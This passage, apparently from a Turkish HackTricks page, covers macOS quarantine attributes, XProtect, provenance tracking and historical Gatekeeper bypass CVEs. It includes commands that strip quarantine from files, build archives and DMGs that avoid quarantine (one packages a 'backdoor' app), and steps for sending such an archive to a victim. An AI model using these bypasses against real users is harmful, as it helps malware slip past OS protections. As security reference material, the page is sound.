enum qtn_flags { QTN_FLAG_DOWNLOAD = 0x0001, QTN_FLAG_SANDBOX = 0x0002, QTN_FLAG_HARD = 0x0004, QTN_FLAG_USER_APPROVED = 0x0040, };

#define qtn_proc_alloc _qtn_proc_alloc #define qtn_proc_apply_to_self _qtn_proc_apply_to_self #define qtn_proc_free _qtn_proc_free #define qtn_proc_init _qtn_proc_init #define qtn_proc_init_with_self _qtn_proc_init_with_self #define qtn_proc_set_flags _qtn_proc_set_flags #define qtn_file_alloc _qtn_file_alloc #define qtn_file_init_with_path _qtn_file_init_with_path #define qtn_file_free _qtn_file_free #define qtn_file_apply_to_path _qtn_file_apply_to_path #define qtn_file_set_flags _qtn_file_set_flags #define qtn_file_get_flags _qtn_file_get_flags #define qtn_proc_set_identifier _qtn_proc_set_identifier

typedef struct _qtn_proc *qtn_proc_t; typedef struct _qtn_file *qtn_file_t;

int qtn_proc_apply_to_self(qtn_proc_t); void qtn_proc_init(qtn_proc_t); int qtn_proc_init_with_self(qtn_proc_t); int qtn_proc_set_flags(qtn_proc_t, uint32_t flags); qtn_proc_t qtn_proc_alloc(); void qtn_proc_free(qtn_proc_t); qtn_file_t qtn_file_alloc(void); void qtn_file_free(qtn_file_t qf); int qtn_file_set_flags(qtn_file_t qf, uint32_t flags); uint32_t qtn_file_get_flags(qtn_file_t qf); int qtn_file_apply_to_path(qtn_file_t qf, const char *path); int qtn_file_init_with_path(qtn_file_t qf, const char path); int qtn_proc_set_identifier(qtn_proc_t qp, const char bundleid);

int main() {

qtn_proc_t qp = qtn_proc_alloc(); qtn_proc_set_identifier(qp, “xyz.hacktricks.qa”); qtn_proc_set_flags(qp, QTN_FLAG_DOWNLOAD | QTN_FLAG_USER_APPROVED); qtn_proc_apply_to_self(qp); qtn_proc_free(qp);

FILE *fp; fp = fopen(“thisisquarantined.txt”, “w+”); fprintf(fp, “Hello Quarantine\n”); fclose(fp);

return 0;

}

</details>

Ve o özniteliği **kaldırın**:
```bash
xattr -d com.apple.quarantine portada.png
#You can also remove this attribute from every file with
find . -iname '*' -print0 | xargs -0 xattr -d com.apple.quarantine

Ve karantinaya alınmış tüm dosyaları şu komutla bulun:

find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.quarantine"

Karantina bilgileri ayrıca GUI’nin dosya kökeni hakkında veri almasını sağlayan, LaunchServices tarafından yönetilen merkezi bir veritabanında ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 içinde saklanır. Ek olarak, kökenini gizlemek isteyen uygulamalar tarafından bu kayıtlar üzerine yazılabilir. Bu işlem LaunchServices APIS üzerinden de yapılabilir.

libquarantine.dylib

Bu kütüphane extended attribute alanlarını manipüle etmeye izin veren birkaç fonksiyon export eder.

qtn_file_* API’leri dosya karantina politikaları ile ilgilenir, qtn_proc_* API’leri ise process’lere uygulanır (process tarafından oluşturulan dosyalar). Export edilmeyen __qtn_syscall_quarantine* fonksiyonları politikaları uygulayanlardır; bu fonksiyonlar istekleri Quarantine.kext’e gönderen ilk argüman olarak “Quarantine” ile mac_syscall’u çağırır.

Quarantine.kext

Kernel uzantısı yalnızca sistemdeki kernel cache üzerinden erişilebilir; ancak, https://developer.apple.com/’den Kernel Debug Kit’i indirerek eklentinin symbolicated bir versiyonunu elde edebilirsiniz.

Bu Kext, tüm dosya yaşam döngüsü olaylarını yakalamak için MACF üzerinden çeşitli çağrıları hook’lar: oluşturma, açma, yeniden adlandırma, hard-link oluşturma… hatta setxattr’ı bile, com.apple.quarantine extended attribute’ünün ayarlanmasını engellemek için.

Ayrıca birkaç MIB kullanır:

• security.mac.qtn.sandbox_enforce: Sandbox ile birlikte karantinanın uygulanmasını zorlar
• security.mac.qtn.user_approved_exec: Karantinadaki procs yalnızca onaylanmış dosyaları çalıştırabilir

Provenance xattr (Ventura ve sonrası)

macOS 13 Ventura, karantinaya alınmış bir uygulamanın ilk kez çalışmasına izin verildiğinde doldurulan ayrı bir provenance mekanizması getirdi. İki artefakt oluşturulur:

• .app bundle dizinindeki com.apple.provenance xattr (birincil anahtar ve flag’ler içeren sabit boyutlu ikili değer).
• /var/db/SystemPolicyConfiguration/ExecPolicy/ içindeki ExecPolicy veritabanında provenance_tracking tablosuna eklenen bir satır; uygulamanın cdhash ve metadata’sını saklar.

Pratik kullanım:

# Inspect provenance xattr (if present)
xattr -p com.apple.provenance /Applications/Some.app | hexdump -C

# Observe Gatekeeper/provenance events in real time
log stream --style syslog --predicate 'process == "syspolicyd"'

# Retrieve historical Gatekeeper decisions for a specific bundle
log show --last 2d --style syslog --predicate 'process == "syspolicyd" && eventMessage CONTAINS[cd] "GK scan"'

XProtect

XProtect, macOS’ta yerleşik bir anti-malware özelliğidir. XProtect, bilinen malware ve güvensiz dosya türlerinin bulunduğu veritabanına karşı herhangi bir uygulamayı ilk çalıştırıldığında veya değiştirildiğinde kontrol eder. Safari, Mail veya Messages gibi belirli uygulamalar aracılığıyla bir dosya indirdiğinizde, XProtect dosyayı otomatik olarak tarar. Eğer veritabanındaki herhangi bir bilinen malware ile eşleşirse, XProtect dosyanın çalıştırulmasını engeller ve tehdidi size bildirir.

XProtect veritabanı, Apple tarafından yeni malware tanımlarıyla düzenli olarak güncellenir, ve bu güncellemeler Mac’inize otomatik olarak indirilip kurulur. Bu, XProtect’in her zaman bilinen en son tehditlerle güncel kalmasını sağlar.

Ancak belirtmek gerekir ki XProtect tam özellikli bir antivirus çözümü değildir. Sadece belirli bir bilinen tehdit listesi için kontrol yapar ve çoğu antivirus yazılımı gibi on-access scanning gerçekleştirmez.

En son XProtect güncellemesi hakkında bilgiyi almak için şu komutu çalıştırabilirsiniz:

system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5

XProtect, SIP tarafından korunan şu konumda bulunur: /Library/Apple/System/Library/CoreServices/XProtect.bundle ve bundle içinde XProtect’in kullandığı bilgileri bulabilirsiniz:

• XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist: Bu cdhash’lere sahip kodların legacy entitlements kullanmasına izin verir.
• XProtect.bundle/Contents/Resources/XProtect.meta.plist: BundleID ve TeamID ile yüklenmesi engellenen eklentiler ve eklentilerin asgari sürümlerini listeler.
• XProtect.bundle/Contents/Resources/XProtect.yara: malware tespit etmek için Yara kuralları.
• XProtect.bundle/Contents/Resources/gk.db: Engellenmiş uygulamaların hash’leri ve TeamID’leri içeren SQLite3 veritabanı.

XProtect ile ilgili ancak Gatekeeper süreciyle doğrudan ilişkili olmayan başka bir App’in de bulunduğunu unutmayın: /Library/Apple/System/Library/CoreServices/XProtect.app.

XProtect Remediator: Modern macOS’ta Apple, belirli malware ailelerini algılayıp düzeltmek için launchd aracılığıyla periyodik olarak çalışan isteğe bağlı tarayıcılar (XProtect Remediator) sağlar. Bu taramaları unified log’larda gözlemleyebilirsiniz:

log show --last 2h --predicate 'subsystem == "com.apple.XProtectFramework" || category CONTAINS "XProtect"' --style syslog

Not Gatekeeper

Caution

Gatekeeper’in her uygulama çalıştırıldığında çalıştırılmadığını unutmayın; yalnızca AppleMobileFileIntegrity (AMFI), daha önce Gatekeeper tarafından çalıştırılmış ve doğrulanmış bir uygulamayı çalıştırdığınızda yürütülebilir kod imzalarını doğrular.

Bu yüzden daha önce bir uygulamayı Gatekeeper ile önbelleğe almak için çalıştırmak, ardından uygulamanın yürütülebilir olmayan dosyalarını (ör. Electron asar veya NIB dosyaları) değiştirmek mümkün ve başka bir koruma yoksa uygulama bu kötü amaçlı eklemelerle çalıştırılabiliyordu.

Ancak artık bu mümkün değil çünkü macOS uygulama bundle’larının içindeki dosyaların değiştirilmesini engelliyor. Yani Dirty NIB saldırısını denerseniz, artık suistimal edilemediğini görürsünüz; çünkü uygulamayı Gatekeeper ile önbelleğe almak için çalıştırdıktan sonra bundle’ı değiştiremezsiniz. Örneğin exploit’te belirtildiği gibi Contents dizininin adını NotCon olarak değiştirir ve sonra uygulamanın ana ikili dosyasını Gatekeeper ile önbelleğe almak için çalıştırırsanız, hata tetiklenir ve uygulama çalışmaz.

Gatekeeper Bypasses

Gatekeeper’ı atlatmanın herhangi bir yolu (kullanıcının bir şeyi indirmesini ve Gatekeeper’ın engellemesi gerekirken çalıştırmasını sağlamak) macOS’ta bir güvenlik açığı olarak değerlendirilir. Geçmişte Gatekeeper’ı atlamaya izin veren tekniklere atanan bazı CVE’ler şunlardır:

CVE-2021-1810

Archive Utility ile çıkarma yapıldığında, 886 karakteri aşan yolları olan dosyaların com.apple.quarantine genişletilmiş özniteliği almadığı gözlemlendi. Bu durum, bu dosyaların istemeden Gatekeeper’ın güvenlik kontrollerini aşmasına izin veriyor.

Daha fazla bilgi için original report’a bakın.

CVE-2021-30990

Bir uygulama Automator ile oluşturulduğunda, çalıştırmak için gereken bilgiler application.app/Contents/document.wflow içinde olur; yürütülebilir dosya içinde değil. Yürütülebilir dosya sadece Automator Application Stub adında genel bir Automator ikilisidir.

Bu nedenle, application.app/Contents/MacOS/Automator\ Application\ Stub dosyasını sistem içindeki başka bir Automator Application Stub’a sembolik link ile işaret edecek şekilde ayarlayabilir ve document.wflow içindekileri (sizin script’inizi) Gatekeeper tetiklenmeden çalıştırabilirsiniz; çünkü gerçek yürütülebilir dosya quarantine xattr’ına sahip değildir.

Beklenen örnek konum: /System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub

Daha fazla bilgi için original report’a bakın.

CVE-2022-22616

Bu bypass’ta bir zip dosyası, uygulamayı application.app/Contents içinden sıkıştırmaya başlayacak şekilde oluşturuldu. Bu durumda quarantine attr application.app/Contents içindeki tüm dosyalara uygulanıyordu fakat Gatekeeper’ın kontrol ettiği application.app’e uygulanmamıştı; dolayısıyla application.app tetiklendiğinde karantina özniteliği yoktu ve Gatekeeper atlanmış oldu.

zip -r test.app/Contents test.zip

Daha fazla bilgi için original report adresini inceleyin.

CVE-2022-32910

Bileşenler farklı olsa da, bu güvenlik açığının istismarı bir öncekine çok benzerdir. Bu durumda application.app/Contents’ten bir Apple Archive oluşturulur; bu nedenle application.app won’t get the quarantine attr, Archive Utility tarafından açıldığında.

aa archive -d test.app/Contents -o test.app.aar

Daha fazla bilgi için original report adresini kontrol edin.

CVE-2022-42821

ACL writeextattr bir dosyaya kimsenin öznitelik yazmasını engellemek için kullanılabilir:

touch /tmp/no-attr
chmod +a "everyone deny writeextattr" /tmp/no-attr
xattr -w attrname vale /tmp/no-attr
xattr: [Errno 13] Permission denied: '/tmp/no-attr'

Ayrıca, AppleDouble dosya formatı bir dosyayı ACEs dahil kopyalar.

In the source code it’s possible to see that the ACL text representation stored inside the xattr called com.apple.acl.text is going to be set as ACL in the decompressed file. So, if you compressed an application into a zip file with AppleDouble file format with an ACL that prevents other xattrs to be written to it… the quarantine xattr wasn’t set into de application:

chmod +a "everyone deny write,writeattr,writeextattr" /tmp/test
ditto -c -k test test.zip
python3 -m http.server
# Download the zip from the browser and decompress it, the file should be without a quarantine xattr

Daha fazla bilgi için original report adresini inceleyin.

Bunun ayrıca AppleArchives ile de istismar edilebileceğini unutmayın:

mkdir app
touch app/test
chmod +a "everyone deny write,writeattr,writeextattr" app/test
aa archive -d app -o test.aar

CVE-2023-27943

Bazı macOS dahili problemleri nedeniyle Google Chrome’un indirilen dosyalara karantina özniteliğini atamadığı keşfedildi.

CVE-2023-27951

AppleDouble dosya formatları bir dosyanın özniteliklerini ._ ile başlayan ayrı bir dosyada saklar; bu, dosya özniteliklerini macOS makineleri arasında kopyalamaya yardımcı olur. Ancak, bir AppleDouble dosyası açıldıktan sonra ._ ile başlayan dosyaya karantina özniteliği verilmediği fark edildi.

mkdir test
echo a > test/a
echo b > test/b
echo ._a > test/._a
aa archive -d test/ -o test.aar

# If you downloaded the resulting test.aar and decompress it, the file test/._a won't have a quarantitne attribute

Quarantine attribute ayarlı olmayan bir dosya oluşturabilmek, Gatekeeper’ı bypass etmek mümkündü. Hile, AppleDouble name convention’ı kullanarak (başına ._ koyarak) bir DMG file application oluşturmak ve quarantine attribute’u olmayan bu gizli dosyaya işaret eden görünür bir dosyayı sym link olarak oluşturmakti.
DMG file çalıştırıldığında, quarantine attribute’u olmadığı için Gatekeeper’ı bypass edecekti.

# Create an app bundle with the backdoor an call it app.app

echo "[+] creating disk image with app"
hdiutil create -srcfolder app.app app.dmg

echo "[+] creating directory and files"
mkdir
mkdir -p s/app
cp app.dmg s/app/._app.dmg
ln -s ._app.dmg s/app/app.dmg

echo "[+] compressing files"
aa archive -d s/ -o app.aar

[CVE-2023-41067]

macOS Sonoma 14.0’te düzeltlen bir Gatekeeper atlatması, istekte bulunmadan özel hazırlanmış uygulamaların çalışmasına izin veriyordu. Yama sonrası ayrıntılar kamuya açıklandı ve sorun düzeltilmeden önce aktif olarak kötü amaçla kullanıldı. Sonoma 14.0 veya daha yeni bir sürümün yüklü olduğundan emin olun.

[CVE-2024-27853]

Mart 2024’te yayımlanan macOS 14.4’te libarchive’in kötü amaçlı ZIP’leri işlemesinden kaynaklanan bir Gatekeeper atlatması, uygulamaların değerlendirmeden kaçmasına izin veriyordu. Apple’ın sorunu giderdiği 14.4 veya daha yeni sürüme güncelleyin.

CVE-2024-44128

İndirilen bir uygulamaya gömülü bir Automator Quick Action workflow, workflow’lar veri olarak muamele edildiği ve Automator yardımcı programı tarafından normal notarization prompt path’in dışında yürütüldüğü için Gatekeeper değerlendirmesi olmadan tetiklenebiliyordu. Bir shell script çalıştıran bir Quick Action içeren özel hazırlanmış bir .app (ör. Contents/PlugIns/*.workflow/Contents/document.wflow içinde) bu nedenle başlatıldığında hemen çalıştırılabilirdi. Apple ek bir onay iletişim kutusu ekledi ve değerlendirme yolunu Ventura 13.7, Sonoma 14.7 ve Sequoia 15’te düzeltti.

Third‑party unarchivers mis‑propagating quarantine (2023–2024)

Popüler çıkarma araçlarındaki birkaç zafiyet (ör. The Unarchiver), arşivlerden çıkarılan dosyaların com.apple.quarantine xattr’ını kaçırmasına neden oldu ve bu da Gatekeeper atlatma imkanları sağladı. Test yaparken her zaman macOS Archive Utility veya yamalanmış araçlara güvenin ve çıkarma sonrası xattr’ları doğrulayın.

uchg (from this talk)

• Create a directory containing an app.
• Add uchg to the app.
• Compress the app to a tar.gz file.
• Send the tar.gz file to a victim.
• The victim opens the tar.gz file and runs the app.
• Gatekeeper does not check the app.

Prevent Quarantine xattr

Bir “.app” bundle’ında quarantine xattr eklenmemişse, çalıştırıldığında Gatekeeper tetiklenmez.

References

• Apple Platform Security: About the security content of macOS Sonoma 14.4 (includes CVE-2024-27853) – https://support.apple.com/en-us/HT214084
• Eclectic Light: How macOS now tracks the provenance of apps – https://eclecticlight.co/2023/05/10/how-macos-now-tracks-the-provenance-of-apps/
• Apple: About the security content of macOS Sonoma 14.7 / Ventura 13.7 (CVE-2024-44128) – https://support.apple.com/en-us/121234
• MacRumors: macOS 15 Sequoia removes the Control‑click “Open” Gatekeeper bypass – https://www.macrumors.com/2024/06/11/macos-sequoia-removes-open-anyway/

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.